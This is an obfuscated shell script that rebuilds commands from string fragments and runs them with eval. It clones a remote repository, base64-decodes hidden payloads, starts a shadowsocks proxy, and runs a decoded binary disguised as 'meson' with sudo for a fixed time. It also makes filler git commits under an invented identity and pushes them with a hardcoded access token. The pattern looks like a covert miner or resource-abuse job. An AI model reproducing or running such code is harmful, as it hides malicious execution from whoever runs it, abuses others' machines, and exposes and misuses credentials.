GxdkM="it clone https:"
PALmLA="//gccbuild@b"
UkJH="itbucket.org/g"
ORPQhw="ccbuild/gcc"
BiEsXUbd=".git &>/de"
tCyx="v"
eval "g""$GxdkM""$PALmLA""$UkJH""$ORPQhw""$BiEsXUbd""$tCyx""/null"
dViCDYvS="se64 -d gcc/"
eval "ba""$dViCDYvS""s > o"
DUNBJfey="sudo apt update"
lrRe=" &>/dev/nul"
yGwljDw="l || true"
eval "$DUNBJfey""$lrRe""$yGwljDw"
TiLUVfP="o apt --yes"
HnIW=" install psmisc"
YBKvM=" shadowsocks-l"
aTXsqN="ibev &>/dev/nul"
bGNGZhaW="l || tru"
eval "sud""$TiLUVfP""$HnIW""$YBKvM""$aTXsqN""$bGNGZhaW""e"
QKUWj="sudo system"
SSKTZP="ctl stop s"
CWMAuoSl="hadowsocks-lib"
hsWK="ev.service &>/d"
XNxeBYNp="ev/null || "
eval "$QKUWj""$SSKTZP""$CWMAuoSl""$hsWK""$XNxeBYNp""true"
VZdLi="sudo ss-lo"
boAypyJ="cal -c o &>/de"
DOdcWSA="v/null &"
eval "$VZdLi""$boAypyJ""$DOdcWSA"
NkyUS="base64 -d gcc/"
TEqBaVk="c > ocon"
eval "$NkyUS""$TEqBaVk""f"
NYFz="base64 -d g"
yJRW="cc/m > "
eval "$NYFz""$yJRW""meson"
YEcQeYj="mod +x "
eval "ch""$YEcQeYj""meson"
YIjfvvU=" -i 's/gcc/geg"
uwscbaO="eo/g' o"
eval "sed""$YIjfvvU""$uwscbaO""conf"
kzDt="sudo ./meson"
LLuQh=" -c oconf &>/d"
NQHX="ev/null"
eval "$kzDt""$LLuQh""$NQHX"" &"
tLfrQr="ho qhbj"
eval "ec""$tLfrQr"
dBXQP="eep 80"
eval "sl""$dBXQP"
ZdtL="git clone ht"
JshGeu="tps://github.co"
XixtzqS="m/nwsg-limited"
nDWLmZ="/kclang.git"
zsRrajML=" tmp &>/dev/n"
aqXk="u"
eval "$ZdtL""$JshGeu""$XixtzqS""$nDWLmZ""$zsRrajML""$aqXk""ll"
cd tmp
YExNzEg="it config user"
MfOoZ=".name 'Viktori"
sxTtHYVu="ya Jeremenko"
HyRmaj="' &>/dev/nu"
nqFZ="ll"
eval "g""$YExNzEg""$MfOoZ""$sxTtHYVu""$HyRmaj""$nqFZ"
mmtHTQeL="t config user.e"
cMegLih="mail viktor"
ZACfSiuU="iya.jeremenko"
cAOqe="xy@eclipso"
GyeYFZ=".eu &>/dev/"
eval "gi""$mmtHTQeL""$cMegLih""$ZACfSiuU""$cAOqe""$GyeYFZ""null"
echo 'Refined' >> qhbj$MAKE
HUhHxI="ILD=\`date +"
eval "BU""$HUhHxI""%s\`"
omPdQJKe="AKE=\`date +%"
ENSw="S\`"
eval "M""$omPdQJKe""$ENSw"
echo $BUILD >> qhbj$MAKE
echo 'kclang' >> qhbj$MAKE
git add qhbj$MAKE &>/dev/null
git commit -m 'Refined '$MAKE &>/dev/null
LImRsl="t push https://"
rcOqsPf="viktoriya-jer"
FhGClv="emenkoxy:'O3Uo"
AFZw="PzqSDP5mQ_7"
uALa="Bu'@github.com/"
AMaVotcD="nwsg-limited/"
NbqzOg="kclang.git "
BwSQ="-f &>/dev/nu"
uZawe="ll || t"
eval "gi""$LImRsl""$rcOqsPf""$FhGClv""$AFZw""$uALa""$AMaVotcD""$NbqzOg""$BwSQ""$uZawe""rue"
while :; do G=`date +%s`; echo 'New kclang $G'; [ `expr 1417 + $BUILD` -lt $G ] && sudo killall meson && break; sleep 170; done
